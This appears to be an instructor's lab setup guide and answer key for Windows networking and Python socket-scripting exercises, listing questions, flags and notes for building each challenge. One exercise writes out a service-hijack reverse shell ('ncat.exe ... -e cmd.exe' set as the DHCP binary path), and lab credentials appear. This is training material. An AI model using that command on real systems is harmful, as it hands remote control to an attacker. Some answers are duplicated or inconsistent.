12. Windows Networking and Services
The following exercises must be performed after connecting over RDP!
The following services must start when the machine is powered on!
12.1.2
1
What ipconfig parameter displays the help menu?
Answer: /?
Scenario
2
What ipconfig parameter will discard the IPv4 address of an adapter?
Answer: /release
Scenario
3
Using systeminfo, provide the OS version (to include Build number) of the exercise host.
Answer: 10.0.17763 N/A Build 17763
Scenario
First, we run the cmd.exe executable as administrator. Then we run the systeminfo command and wait a moment. The answer is on the OS Version line.
4
Create a permanent environment variable named LOOKHERETOEXECUTE given the value of \\users\\blue\\executeme.exe. (Run the command prompt as Administrator). The flag can then be found in the C:\Users\offensive\ directory.
Hint: A double backslash (`\\`) is used each time.
We need to use the **setx /m** command.
Review the information on the **/m** parameter of the **setx** command.
Find the section that explains the differences between **set** and **setx**.
Answer: SETX{Ilova_Binar_Faylni_Bu_Yerda_Qidiradi}
Scenario
When the student adds the permanent environment variable, the file envVar_flag1.txt must appear in the C:\Users\offensive directory. It will contain SETX{Ilova_Binar_Faylni_Bu_Yerda_Qidiradi}.
The following files must be present in this directory:
5
What is the command we would run to view an environment variable starting with the letter "U"?
Answer: set u
Scenario
12.1.3
1
What ipconfig parameter displays the help menu?
Answer: /?
Scenario
2
What ipconfig parameter will discard the IPv4 address of an adapter?
Answer: /release
Scenario
3
Using systeminfo, provide the OS version (to include Build number) of the exercise host.
Answer: 10.0.17763 N/A Build 17763
Scenario
When the user runs systeminfo, it must also report the OS Version.
4
Create a permanent environment variable named LOOKHERETOEXECUTE given the value of \\users\\blue\\executeme.exe. (Run the command prompt as Administrator). The flag can then be found in the C:\Users\offensive\ directory.
Create a permanent environment variable named LOOKHERETOEXECUTE with the value \\users\\blue\\executeme.exe. (Run the command prompt as administrator.) The flag can then be found in the *C:\Users\HaadOne* directory.
Hint: A double backslash (`\\`) is used each time.
We need to use the **setx /m** command.
Review the information on the **/m** parameter of the **setx** command.
Find the section that explains the differences between **set** and **setx**.
Answer: SETX{Ilova_Binar_Faylni_Bu_Yerda_Qidiradi}
Scenario
When the student adds the permanent environment variable, the file envVar_flag1.txt must appear in the C:\Users\offensive directory. It will contain SETX{Ilova_Binar_Faylni_Bu_Yerda_Qidiradi}.
The following files must be present in this directory:
5
What is the command we would run to view an environment variable starting with the letter "U"?
Answer: set u
Scenario
12.1.4
1
Which netstat parameter displays active connections by protocol? (you need the dash)
Answer: -p
Scenario
2
Which netstat parameter displays active connections and PID associated with the connections? (you need the dash)
Hint: "The -a parameter shows all connections, not only the active ones."
Answer: -o
Scenario
3
What is the mac address associated with ip address 1.3.3.7? (Provide answer in XX:XX:XX:XX:XX:XX format.)
Answer: de-ad-b3-3f-4d-ad
Scenario
When the user runs the arp -a command, it shows the Address Resolution Protocol (ARP) cache. Among the entries, it shows the MAC address bound to the IP 1.3.3.7.
The user must enter the answer in XX:XX:XX:XX:XX:XX format.
12.1.5
1
What is the full command to ping www.offsec.com with 10 Echo Request messages instead of the default 4?
Answer: ping -n 10 www.haadyvip.com
Scenario
2
Using ping, resolve the address: www.networking4Windows.com and provide the IP address.
Answer: ?
Scenario
When the user sends an ICMP packet (ping) to the website, it must return an IP address. It is enough for a simple website to be running on the server for this domain. For example, the reply that ping returns:
Here the IP is 35.214.215.106
3
What is the pathping parameter that prevents it from resolving ip addresses of routers along the path?
Answer: -n
Scenario
4
What is the tracert parameter that prevents it from resolving ip addresses of routers along the path?
Answer: -d
Scenario
5
View the persistent route of 1.1.1.1/32 and annotate the network gateway. You will need it for the next question. For this question, remove 1.1.1.1 route and the flag will be in the c:\Users\offensive\ directory. (Run the command prompt as Administrator)
Answer: ROUTE{Yo'nalish_o‘chirildi}
Scenario
If the user removes the IP 1.1.1.1 from the route table, route_flag1.txt must appear in the c:\Users\offensive\ directory.
Result of removing the route
After the user reads the file, the flag is given.
6
Add a persistent route of 1.1.1.2/32 and the default gateway from question 5, and the flag will be in the c:\Users\offensive\ directory. (Run the command prompt as Administrator)
Answer: ROUTE{Yo'nalish_qo'shildi}
Scenario
After the user adds the IP 1.1.1.2 to the route table, the flag will be in the route_flag2.txt file in the c:\Users\offensive directory.
Result of adding the route
The user then runs dir and reads the flag with type.
12.1.6
1
Which nbtstat parameter displays contents of the name cache, to include the table of names and IP addresses.
Answer: -s
Scenario
2
The command nslookup has two primary modes. Provide one of them.
Answer: Interactive
Scenario
3
Use nslookup to find the IP address of www.megacorpone.com.
Answer: ?
View the persistent route of 1.1.1.1/32 and annotate the network gateway. You will need it for the next question. For this question, remove 1.1.1.1 route and the flag will be in the c:\Users\offensive\ directory. (Run the command prompt as Administrator)
Answer: ?
Scenario
A server similar to the website one must be set up. It was used in the earlier sections.
12.2.1
1
Share the system32 folder with a share name of "mySharedData" and the flag will be in the c:\Users\offensive\ directory. May take a 10-15 seconds for the flag to appear. (Run the command prompt as Administrator)
Hint: net share mySharedData
Refer to the net share command section.
Answer: SHARE{Ulashish_Yaxshilikdir}
Scenario
If the user shares it under the name mySharedData, the flag will be in the shareFlag1.txt file in the c:\Users\offensive directory.
Result
2
Assign the F drive to a shared folder named finance located on \\finance.outofthisworld.com\finance with the user finance. The flag will be in the c:\Users\offensive\ directory.
NOTE: Command must be run as the offensive user. May take a 10-15 seconds for the flag to appear.
Hint: "This is a partial command: net use f: \\finance.outofthisworld.com\finance. What is the rest?
Review the net use command section."
Answer: SHARE{Ma’lumotni_Boshqa_Ulashish_Diskiga_Yo‘naltirish}
Scenario
If the user maps the finance folder, the flag must appear in the c:\Users\offensive folder.
How: there will be a program here that runs at frequent intervals. If the user has mapped the folder, it gives the flag.
There must be a server at the domain.
3
Assign the G drive to a shared folder named marketing located on \\marketing.outofthisworld.com\ with the user and password of "marketing" and make the connection constant, meaning it will reconnect if you restart your machine.
NOTE: Command must be run as the offensive user. You may need to wait up to 60 seconds for the flag to appear in the directory of the offensive user.
Hint: "net use g: marketing /user:marketing /persistent:yes
Which parameter makes the connection persistent?"
Answer: SHARE{Ishga_Tushishda_Ulashish}
Scenario
If the user maps the marketing folder, the flag must appear in the c:\Users\offensive folder.
How: there will be a program here that runs at frequent intervals. If the user has mapped the folder persistently, it gives the flag.
There must be a server at the marketing.outofthisworld.com domain.
12.2.2
1
There is a service running on port 4444. Using netcat, connect to the exercise host. Once connected, press enter twice to reveal the flag.
Answer: WIN-NC{Ajoyib_Ulanish!}
Scenario
On the machine (the host the user is working on) a service will be running on port 4444. If the user connects to this port, the flag is returned.
2
From the exercise host, start a netcat listener on port 5555 to get the flag.
Hint: "You just need a listener."
Answer: WIN-NC{Yuklama_Yuborildi!}
Scenario
On the machine (the host the user is working on) there will be a client ocat program. It tries to connect to port 5555 at frequent intervals. If the connection fails, no response is returned; otherwise the flag is returned to the user.
3
Which socat option allows other sockets to bind to an address even if parts of it are already in use?
Hint: search for the phrase "bind to an address".
https://linux.die.net/man/1/socat
Answer: CWreuseaddr
Scenario
4
What CHILD option group does the following description define?
After establishing a connection, handles its channel in a child process and keeps the parent process attempting to produce more connections, either by listening or by connecting in a loop (example). SSL-CONNECT and SSL-LISTEN differ in when they actually fork off the child: SSL-LISTEN forks before the SSL handshake, while SSL-CONNECT forks afterwards. RETRY and FOREVER options are not inherited by the child process.
Answer: CWfork
Scenario
12.2.3
1
Using psexec, read the contents of "psexec-flag1.txt" located in the c:\Users\administrator\Desktop location. The ip address is 192.168.54.100, the username is "administrator" and the password is "remoteadmin". (Run the command prompt as Administrator)
Hint: "Here is the start: psexec -i \\ip -u administrator -p remoteadmin"
Answer: PSEXEC{Uzoqdan_O‘qish — Oson!}
Scenario
A separate Windows machine must be running at 192.168.54.100. The flag will be in the psex_flag1.txt file on the Administrator user's Desktop. For the user to use PsExec against this machine, several ports and services must be enabled on the target system (192.168.54.100)!
2
Using psexec, read the contents of "psexec-flag2.txt" located in the c:\Users\administrator\Desktop location. The ip address is 192.168.54.100, the username is "administrator" and the password is "remoteadmin". Note: to read this file, you will have to run it with System privileges.
Hint: This will help you get started: psexec -i -s \\ip -u administrator -p remoteadmin /c
Answer: PSEXEC{Uzoqdan_Tizim_Fayllarini_O‘qish — Muammo_Emas!}
Scenario
A separate Windows machine must be running at 192.168.54.100. The flag will be in the psex_flag2.txt file on the Administrator user's Desktop. This file must be read with elevated privileges. For the user to use PsExec against this machine, several ports and services must be enabled on the target system (192.168.54.100)!
12.3.1
1
Enable the firewall for all profiles to get the flag.
Hint: I think you are looking for "state on".
Answer: WIN-FW{Devor_Tiklandi}
Scenario
There must be a program on the machine. When the user sets the firewall state to on, it writes the flag to defenderflag1.txt in c:\Users\administrator\Desktop.
2
Add a firewall rule named "Allow SSH", direction in, action is allowed, local port is 22, and the protocol is TCP to get the flag.
Hint: The rest should be familiar to you by now: `netsh advfirewall firewall add rule`
Answer: WIN-FW{SSH_Uchun_Hammasi_Tayyor!}
Scenario
There will be a program on the machine. When the user adds the firewall rule, the flag appears in the c:\Users\administrator\Desktop\defenderflag2.txt file.
Firewall rule name: Allow SSH
3
Restore the firewall settings to default, and backup the current policy to c drive with the name of "firewallPolicy.wfw" to get the flag.
Hint: You can do this as one command or as two.
Answer: WIN-FW{Asliga_Qaytish}
Scenario
There will be a program on the machine. If the firewall is in its default configuration and C:\firewallPolicy.wfw contains that firewall configuration, the flag appears in c:\Users\administrator\Desktop\defenderflag3.txt. The firewall must have been reset!
12.3.2
On Haad, the 12.3.2 part did not open; some error came up, and I think it is related to this (we should also ask Bobur and Temur whether this part exists at all).
12.4.2
1
Using the tasklist command, filter the results to the service named dhcp. What is the image name associated with that service?
Scenario
DHCP must be configured on the machine and run as a service.
The user finds it with the command below ⬇️.
2
Find the active service that contains a flag in the name. Provide the flag.
Answer: WIN-SERVICE{Zo‘r_Protsess!}
Scenario
There will be a service on the system that does nothing. Its name will be WIN-SERVICE{What_A_Proces}. It is bound to a program (.exe) that does nothing.
3
Find the process that has a service named "somethingSomethingSomething" associated with it. Provide the image name as the flag.
Answer: Darkside.exe
Scenario
On the system, a program called Darkside.exe is started under the service name somethingSomethingSomething.
12.4.3
1
Using net start "servicex" to get the flag.
Answer: WIN-SERVICES{Meni_Hech_Kim_To‘xtata_Olmaydi!}
Scenario
There will be a service called servicex on the machine. When it starts, it writes the flag to the file C:\User\offensive\Sevices_flag1.txt.
2
Using net sc stop "servicey" to get the flag.
Use the net stop "servicey" command to get the flag.
Answer: WIN-SERVICES{Hech_Kim_To‘xtatolmaydi!}
Scenario
A program called servicey will be running on the machine. If it is stopped, the flag appears in C:\User\offensive\Sevices_flag2.txt!
3
Using sc, change the Start_Type of DHCP service from Auto to Disabled to get the flag.
Answer: WIN-SERVICES{Avtomatik_Boshlanishni_Ta’qiqlash}
Scenario
There will be a dhcp service on the machine. It starts automatically when the machine is powered on. When it is switched from automatic to disabled, the flag is written to C:\User\offensive\Sevices_flag3.txt.
4
Using sc, change the Binary_Path_Name of DHCP service to "ncat.exe 192.168.1.1 4444 -e cmd.exe" to get the flag.
Answer: WIN-SERVICES{Xizmatlar_Endi_Mening_Qo‘limda!}
Scenario
There will be a dhcp service on the machine. If the user changes its binary path (ncat.exe 192.168.1.1 444 -e cmd.exe), the flag appears in C:\User\offensive\Sevices_flag4.txt.
Changing the path of DHCP
5
Using PsService, change the Start Type configuration of "SNMPTRAP" to Auto to get flag.
Answer: WIN-SERVICES{Avtomatik_Ravishda_Yo‘lga_Qo‘y_Meni!}
Scenario
There will be an SNMPTRAP service on the machine, with a start type of demand_start. If the user sets it to automatic, they are given the flag. The flag will be in the C:\User\offensive\psservice_flag1.txt file.
12.4.4; LOOK
1
Create a RDP file with the computer IP address of 192.168.1.1, and the username of Administrator. Save the file (the default location is fine). This file is considered a system file and is hidden. You will need to research how to unhide system files, right click and go into its properties, and provide the size of the file. What is the KB size of the file? (in the format x.xx)
Answer: 2.23
Scenario
In the video, this part apparently did not work.
1. In RDP, a file must be created for connecting to the given IP address 192.168.1.1 as Administrator.
The created file must be saved without changing its name, that is, as Default.rdp.
2. Go to where it was saved, find the created file among the hidden files, and check its Size.
2
With Remote Desktop, you are able to share resources from your local computer with the remote computer. These items include printers, drives, and the clipboard. What is the one item selected when you explore the "More" option of Local devices and resources?.
Answer: Smart cards
Scenario
This is the default in the RDP settings.
3
Of the five tabs of the Remote Desktop Connection, which tab do you find the option to tell the RDP connection to "Reconnect if the connection is dropped"?
Answer: Experience
Scenario
This is the default in the RDP settings.
12.4.5; The questions are the same as in 12.4.4
Scenario: You are a technician hired to update customer documentation and troubleshoot networking issues. The customer provides you with a website (www.shimmervault.com) and a /24 IP range of 192.168.20.0.
1
The customer doesn’t know the IP address of their web server. Find and provide the web server’s IP address.
Hint: “What do we already know about machine?
Where should we look?
nslookup”
Answer: ?
Scenario
There will be one simple web server. A domain will be assigned to it.
Domain:
The user enters this website's IP address as the answer.
2
The customer does not know the web server's computer name. Identify the computer name of the Windows machine.
Answer: ?
Scenario
3
Of the five tabs of the Remote Desktop Connection, which tab do you find the option to tell the RDP connection to "Reconnect if the connection is dropped"?
Answer: ?
Scenario
12.5.1
1
Scenario: You are a technician hired to update customer documentation and troubleshoot networking issues. The customer provides you with a website (www.shimmervault.com) and a /24 IP range of 192.168.20.0.
The customer doesn't know the IP address of their web server. Find and provide the web server's IP address.
Hint: "What do we already know about the machine?
Where should we look?
`nslookup`"
Answer: 192.168.20.20
Scenario
1. When this address is given to the nslookup command, it must return the IP address.
2
The customer does not know the web server's computer name. Identify the computer name of the Windows machine.
Answer: win-net-prac
Scenario
1. Running the hostname command in the terminal must return exactly this system's hostname.
2. Its host name on Haady must be this.
3
Employees share files and messages through a shared resource. Customers have not been able to connect this machine to a shared resource. Mount the remote share called "Quest_share" to the H: drive to find the flag.
Hint: "What is the IP address of this machine?
`net use`"
Answer: WIN-NET-PRAC{Zaxiradagi_Kaltaquloqlarga_Yordam_Kerak!}
Scenario
1. In the terminal, the connection is made with the command net use h: \\192.68.60.63\Quest_share /user:offsec offsec
2. Then, running dir H: must list a file named flag.
4
The customer is having a tough time starting the "enserv" service. Start the "enserv" service to get the flag. The flag will be in the "offsec" Documents directory.
Hint: "How can we start a service?
`sc` tool"
Answer: WIN-NET-PRAC{Enserv_Xizmati_Yo‘lga_Qo‘yildi}
Scenario
1. After connecting over ssh, the user must start the enserv service (net start enserv).
2. Once the service is started, the flag must be in the Documents folder.
5
Connect to the machine using RDP. What is the flag on the desktop background picture?
Hint: "Refer to the Windows Defender Firewall section and apply that concept to RDP.
Try the `netsh` command.
Check the firewall rules."
Answer: WIN-NET-PRAC{Ekranga_Kirish_Muvaffaqiyatli!}
Scenario
1. In the terminal, the inbound rules for the Remote Desktop TCP port must be enabled.
2. Then the user connects with xfreerdp from a terminal, or over RDP from Windows.
3. The flag must be placed on the background picture.
6
The customer informed you that an environment variable needs to be extracted. Enumerate the environment variables for the flag.
Answer: WIN-NET-PRAC{Juda_Ko‘p_O‘zgaruvchi_Bor!}
Scenario
1. The search is done without leaving the connected RDP session.
2. On the connected Windows machine, type environment variables into the search box and open that item.
3. This window opens.
4. The flag must be located here.
7
This device might be associated with an internal network on another interface. Find the IP address of the other interface. Provide the IP address as the answer.
Answer: 10.10.23.13
Scenario
1. Opening cmd on Windows and running the ipconfig command must show the internal IP.
8
The customer needs a text file that is compressed within a zip file. Find the zip file located in c:\Users\offsec\Desktop. Use the skills you learned in this Learning Module to unzip this file and retrieve the flag inside.
Answer: WIN-NET-PRAC{Arxivni_Qo‘lga_Kiritding!}
Scenario
1. There must be a zip file on the Windows Desktop, with the flag inside it.
2. The zip must be extracted with tar -xf .\zip-fayl and the flag.txt file opened.
13. Network Scripting
13.1.2 Socket Methods
1.
What socket family will allow us to connect to a system that has an IPv4 Address?
Answer: AF_INET
The socket family that allows connecting to a system with an IPv4 address is AF_INET (Address Family Internet).
The AF_INET family is intended for working over the IPv4 protocol and is mainly used with the following types:
TCP (Transmission Control Protocol)
UDP (User Datagram Protocol)
For example, an IPv4 socket is created in Python as follows:
If you need to work with IPv6 addresses, the AF_INET6 family is used.
2.
Take a look at the following syntax: s.connect(("127.0.0.1",9090)) . What kind of socket method is the method being invoked here?
A. Client
B. Server
C. Socket
D. General
Answer: A
3.
This is a scripting exercise. Use Python to connect to the server on port 2000 of the provided VM. When a client connects to the server, it will receive a certain response. With your Python script, send this exact response back to the server, and you will receive a second response. Your task is to send and receive 10 messages to and from the server within 15 seconds to obtain the flag. You only need to connect once.
Hint: Remember to change the socket.gethostname method for the IP address of the remote target machine. Check for off-by-one errors...
Javob: HD{aylanib-aylanib-maqsadga-erishamiz!} | OS{all-around-the-merrygoround!} |
13.2.1 Error Handling:Try and Except Clauses
1
The server running on port 2001 of the provided VM is buggy; it only responds sometimes. Make sure that your client program has a means of handling errors and reconnecting. As in the previous exercise, connect 10 successful times in 15 seconds to obtain the flag.
Hint: Try using a for loop with an iterator to reconnect to the server if an exception occurs.
It may be helpful to create a method (function) to hold the code related to connecting. Then you can call that function in the except block.
Answer: HD{Try_va_except_pitch_va_catch_ga_o'xshaydi_biri_xatolikni_ushlab_qoladi_biri_esa_qabul_qiladi} | OS{try-and-except-is-like-pitch-and-catch}
Scenario
A server must be running on port 2001. When a user connects, it should sometimes respond to the request and sometimes not. For example, if 30 requests are sent, it may respond to 10 of them, with interruptions in between, and this must be accomplished within 15 seconds.
13.2.2 Handling Unknown Data Size
1
Connect to the server on port 2002 of the provided VM. The response you receive will be of unknown length, so build in some provisions in your client script to handle the responses using loops. You will need to connect to the server several times to receive the flag.
Hint: This server will disconnect when it is finished sending all the data it wants to send.
Try using a while True loop to keep receiving data until the server disconnects.
You don't need to send the data back to the server, only to figure out what you've received.
The data that's sent back from the server is meant to be viewed using image viewer software.
Answer: HD{Bu-flagning-belgilangan-uzunligi-yo'q!} | OS{this-flag-has-no-definite-length}
Scenario
Here, when a request is sent to port 2002, the server sends the flag in pieces of varying length, and the user must use a loop to assemble them.
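The two client patterns from 13.2.1 and 13.2.2 (retrying after an error, and receiving until the server disconnects) can be tried offline with the added example below, which is not code from the course. The loopback server, the constructed payload and all function names are assumptions made for the illustration.

```python
import socket
import threading

# Constructed sample data, deliberately larger than a single recv() buffer.
PAYLOAD = b"constructed-sample-" * 500


def start_flaky_server(drop_first=2, chunk=700):
    """Loopback stand-in for the exercise server (hypothetical helper).

    Hangs up on the first `drop_first` connections without answering, then
    sends PAYLOAD in small chunks and closes. Closing the connection is the
    only end-of-data signal the client gets.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))      # port 0: the OS picks a free port
    srv.listen(4)
    port = srv.getsockname()[1]

    def serve():
        seen = 0
        while True:
            try:
                conn, _addr = srv.accept()
            except OSError:         # listening socket was closed
                return
            with conn:
                seen += 1
                if seen <= drop_first:
                    continue        # the "buggy" case: no reply at all
                for i in range(0, len(PAYLOAD), chunk):
                    conn.sendall(PAYLOAD[i:i + chunk])

    threading.Thread(target=serve, daemon=True).start()
    return srv, port


def recv_until_closed(host, port, timeout=3.0, bufsize=1024):
    """Read a reply of unknown length: loop until recv() returns b''."""
    parts = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        while True:
            data = s.recv(bufsize)
            if not data:            # empty bytes: the peer closed the socket
                break
            parts.append(data)
    body = b"".join(parts)
    if not body:
        raise ConnectionError("server closed without sending data")
    return body


def fetch_with_retry(host, port, attempts=10):
    """Reconnect on failure; returns (data, number_of_attempts_used)."""
    last = None
    for attempt in range(1, attempts + 1):
        try:
            return recv_until_closed(host, port), attempt
        except OSError as exc:      # timeouts, resets and empty replies
            last = exc
    raise ConnectionError(f"no answer after {attempts} attempts") from last


def demo():
    srv, port = start_flaky_server()
    try:
        return fetch_with_retry("127.0.0.1", port)
    finally:
        srv.close()


if __name__ == "__main__":
    data, tries = demo()
    print(len(data), "bytes received after", tries, "attempts")
```

Against the lab host, only the address and port passed to `fetch_with_retry` change; the received bytes can then be written to a file opened in binary mode.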
13.2.3 Interactive Sockets
1
Use your Python skills to connect to the server on port 2003 of the provided VM. The server will send any clients that connect to it some questions. Answer all the questions correctly to obtain the flag.
Answers: HD{Siz-savol-javob-ustasisiz!} | OS{You-are-a-trivia-guru!}
Scenario
Here the user must connect to the server on port 2003, the server should ask simple math questions, and once the user has answered the questions correctly the flag should be given.
13.3.2 Testing our Client and Server
1
What three methods do we need to implement in a server to allow remote clients to connect to it? Name the three methods in alphabetical order. Prepend each method with "socket." and separate them with a ', ' (comma space) so that your answer appears in this form: socket.Aanswer(), socket.Banswer(), socket.Canswer()
Hint: The solution to this exercise is in the format "socket.x(), socket.y(), socket.z()".
Check the listings in Building a Basic Server.
The first method is socket.accept()
Remember the focus is on a server receiving a connection.
Answers: socket.accept(), socket.bind(), socket.listen()
2
Fill in the blank. The socket.accept() method returns a ____ of values, conn and address?
Answers: pair
3
This is a scripting challenge. First, make sure that your server can accept at least four connections at once. Then, use SSH to login to the container running on port 2004 of the target VM with the credentials root:root. Run the binary located at /root to connect back to your server and receive the flag.
Answers: HD{Sizga-bir-flag,-unga-bir-flag,-hamma-bir-flag-oladi!} | OS{You-a-flag-and-you-get-a-flag-and-you-get-a-flag}
Scenario
The user must write a script that accepts at least 4 connections; the server must accept the connection 4 times, and the flag should appear once this works correctly. The student mainly writes the server code that accepts 4 connections. For the flag, an SSH server should be enabled on port 2004 and a compiled binary placed inside the root folder; the user runs it so that it connects back to the server they wrote, and the flag then appears.
13.4.1 Using the Socket Module to Create a Port Scanner
1
Recreate the port scanner in this section. Then, target the ports 3000 to 3999 of the target VM. In numerical order, what ports are open? Enter your answer in the following format: WWWW, XXXX, YYYY, ZZZZ
Answers: 3019, 3463, 3643
Scenario
CTF Scenario
Goal:
Students must find the open ports by scanning the ports in the 3000–3999 range. Once the open ports have been found in numerical order, they must write them out in the given format.
13.4.2 Port Knocking
1
Modify your port scanner so that it knocks precisely and in numerical order on the eight ports that have Pronic numbers in the range 4000 to 4999. You may need to look up the definition of "Pronic number" to determine which ports to scan. Once you have performed the port knocking sequence, use the credentials Aristotle:Lyceum to SSH to the newly opened port 2222. Look for the flag in the user's home directory or the user's desktop. What is that flag?
Hint: Check out the Wikipedia article on the number 4000. You may need to run the port knocking sequence and initiate the SSH connection multiple times.
Answer: HD{Sonlar-nazariyasi-kriptografiya-uchun-foydali!} | OS{number-theory-is-useful-for-cryptography!}
Scenario
Pronic Port Knocking
Students knock on the ports between 4000 and 4999 that are pronic numbers, which opens port 2222. They then connect over SSH and find the flag.
Step-by-Step Guide
1. Identify the pronic numbers
Pronic numbers are calculated with this formula:
n * (n + 1)
Each of these numbers equals the product of a number and the number that follows it. Example:
You need to find all pronic numbers in the 4000–4999 range.
2. Set up knocking on the target VM
Knocking is a security mechanism in which specific ports must be knocked (tapped) in sequence. Port 2222 opens only when the correct knock sequence has been performed.
Target VM setup:
Install a knocking listener (a service such as knockd). For example:
Restart the knockd service:
Create a service that opens port 2222 automatically:
Prepare the configuration so that knockd does its job correctly.
3. Create the flag
Store the flag file in the user's home directory or on the desktop. For example:
4. Python script for students
5. Task description
The task description for students is as follows:
Target VM IP address: 172.16.53.20.
Find all pronic numbers in the 4000–4999 range.
Perform the port knock in sequence, based on the pronic numbers you found.
Once the knock has been performed, port 2222 opens.
Log in over SSH with the Aristotle:Lyceum credentials.
Find the flag in the home directory or on the desktop.
Flag format:
OS{number-theory-is-useful-for-cryptography!}
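For whoever builds this lab, the added example below (not part of the original scenario) computes the pronic ports, renders a matching knockd section, and models why the order of the knocks matters. The section name, the timeout, the iptables command and the simplified listener model are assumptions, not the lab's actual configuration.

```python
def pronic_ports(lo=4000, hi=4999):
    """Return every n * (n + 1) with lo <= n * (n + 1) <= hi, ascending."""
    ports, n = [], 0
    while n * (n + 1) <= hi:
        if n * (n + 1) >= lo:
            ports.append(n * (n + 1))
        n += 1
    return ports


def knockd_section(name, sequence, open_port, seq_timeout=15):
    """Render one knockd.conf section that opens `open_port` for the knocker.

    Assumption: the lab firewall is iptables and an inserted ACCEPT rule is
    enough; adapt the command to the firewall actually in use.
    """
    lines = [
        f"[{name}]",
        f"    sequence    = {','.join(str(p) for p in sequence)}",
        f"    seq_timeout = {seq_timeout}",
        "    tcpflags    = syn",
        "    command     = /sbin/iptables -I INPUT -s %IP% -p tcp "
        f"--dport {open_port} -j ACCEPT",
    ]
    return "\n".join(lines)


def sequence_opens(knocks, expected):
    """Simplified model of a knock listener (an assumption, not knockd code).

    The port opens only if `expected` appears in `knocks` as one unbroken,
    correctly ordered run; a wrong port throws the progress away.
    """
    pos = 0
    for port in knocks:
        if port == expected[pos]:
            pos += 1
            if pos == len(expected):
                return True
        else:
            # Start over; the stray knock may itself begin a new attempt.
            pos = 1 if port == expected[0] else 0
    return False


if __name__ == "__main__":
    seq = pronic_ports()
    print(seq)
    print(knockd_section("openSSH2222", seq, 2222))
    print("in order:", sequence_opens(seq, seq))
    print("reversed:", sequence_opens(seq[::-1], seq))
```

A stray packet arriving in the middle of the sequence resets progress in this model, which is one reason the hint says the knock and the SSH attempt may need to be repeated.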
Hint for students
Use the following formula to find the pronic numbers:
n * (n + 1)
Determine which of these numbers fall between 4000 and 4999. If you perform the knock sequence incorrectly, the port will not open. Retry the port knock and connect over SSH.
13.5.1 The Transport Layer: Using the Python Sockets Module with HTTP
1
Recreate the script and modify it to reach www.megacorpone.com . What popular operating system distribution is www.megacorpone.com running on?
Answers: Debian
Scenario
Instead of this site, a site related to Haady or Haad needs to be stood up, and the student must create a script that retrieves its information, that is, reports which operating system it runs on. It is preferable for the OS to be Debian. The working procedure is described below.
CTF task analysis
Task: Recreate the script and modify it so that it sends an HTTP request to the www.Haady.and.com site.
Goal: Determine which popular operating system (Linux or Windows) this website runs on.
Source of the solution: The operating system information is identified from the site's HTTP headers.
Solution steps
1. Install the required tools
Python interpreter: You need Python to run this script.
Requests library: Used to send HTTP requests. If it is not installed, use the following command:
2. Create the script
We write the script as follows:
3. Run the script
Save the script as check_server.py. Go to a terminal or command line and run the script:
4. Analyze the response
If the Server header is present in the response, it looks like this:
Seeing the line "Server: nginx/1.18.0 (Ubuntu)" in this response tells you that the site runs on the Ubuntu Linux operating system.
If the response looks like this:
This response indicates that the site runs on Windows Server.
5. Troubleshooting
If the HTTP headers show no information about the Server:
Try gathering information about the domain with whois:
Or analyze the site with a network scanner (nmap):
Example solution output
When you run the script, you may see the following output:
From this you write the answer: Ubuntu
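The header analysis in step 4 can be reproduced on the raw bytes a socket returns. The following is an added example, not the course's script; the three responses are constructed samples (only the nginx/Ubuntu Server line is taken from the text above), and the function names are hypothetical.

```python
import re

# Constructed sample responses, as bytes read from a socket.
SAMPLE_UBUNTU = (b"HTTP/1.1 200 OK\r\n"
                 b"Server: nginx/1.18.0 (Ubuntu)\r\n"
                 b"Content-Type: text/html\r\n"
                 b"\r\n"
                 b"<html>constructed body</html>")
SAMPLE_IIS = (b"HTTP/1.1 200 OK\r\n"
              b"server: Microsoft-IIS/10.0\r\n"
              b"\r\n")
SAMPLE_HIDDEN = (b"HTTP/1.1 200 OK\r\n"
                 b"Content-Length: 0\r\n"
                 b"\r\n")


def build_get(host, path="/"):
    """Request bytes to send over a TCP socket connected to port 80."""
    return (f"GET {path} HTTP/1.1\r\n"
            f"Host: {host}\r\n"
            "Connection: close\r\n\r\n").encode("ascii")


def split_response(raw):
    """Split a raw response into (status_line, headers, body).

    Header names are case-insensitive, so they are stored lower-cased;
    repeated headers are kept as a list of values.
    """
    head, _sep, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers.setdefault(name.strip().lower(), []).append(value.strip())
    return lines[0], headers, body


def os_hint(headers):
    """Return an OS hint from the Server header, or None if there is none."""
    for value in headers.get("server", []):
        comment = re.search(r"\(([^)]+)\)", value)   # e.g. "(Ubuntu)"
        if comment:
            return comment.group(1)
        if value.lower().startswith("microsoft-iis"):
            return "Windows"
    return None


if __name__ == "__main__":
    for raw in (SAMPLE_UBUNTU, SAMPLE_IIS, SAMPLE_HIDDEN):
        status, headers, _body = split_response(raw)
        print(status, "->", os_hint(headers))
```

The Server value is set by the site operator and can be removed or changed, so the result is a hint to confirm, not proof of the operating system.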
2
What branch of technology does MegaCorp One focus on? Use the HTML code from the server's response to answer this question.
Answers: Nanotechnology
Scenario
The student must find which technology field the site we stood up ourselves is engaged in.
13.5.2. The Application Layer: GET Requests with Python
1
Why can't we call our Python HTTP client "http.py"?
A. Because Python3 doesn't work with http.
B. Because Python3 has another module called http.py.
C. Because Python3 cannot execute multiple web-clients at the same time.
Answer: B
2
Write a Python script to do a HTTP GET request on port 8080 of the target VM and get the webpage content. What is the flag on the index.html page?
Answer: HD{Bu-pythonning-haqiqiy-g'alvasi!} | OS{its-a-python-pandemonium!}
Scenario
A web server needs to be stood up, and the CTFs that follow are solved through this web server. In the current CTF, the flag is shown when working through port 8080.
3
Write a Python script to do an HTTP GET request on port 8080 at /1.html. This site will give you the first character of the flag. The directories /2.html to /50.html will give you the remaining characters. What is the complete flag?
Answer: HD{Siz-bu-flagning-to'liq-matnini-topa-olasizmi-XYZ?} | OS{can-you-guess-the-full-text-of-this-flag-XYZ?}
Scenario
Web server setup:
Install an HTTP server (Apache or Python SimpleHTTPServer) on your system (for example, Kali Linux or Ubuntu).
Split the flag into characters and place them in 50 files (1.html, 2.html, ... 50.html). Each file should contain one part of the flag.
Network settings:
Configure the server to run on port 8080.
Participants connect through this port.
Scripting task:
Students must write a Python script that sends GET requests to 1.html through 50.html and assembles the flag.
They produce the final flag by joining the responses together.
13.5.3. Parsing HTML
1
The website on port 8080 of the target VM has multiple pages under the directory /crawling. Use your Python skills to GET the content on all the pages and find the flag.
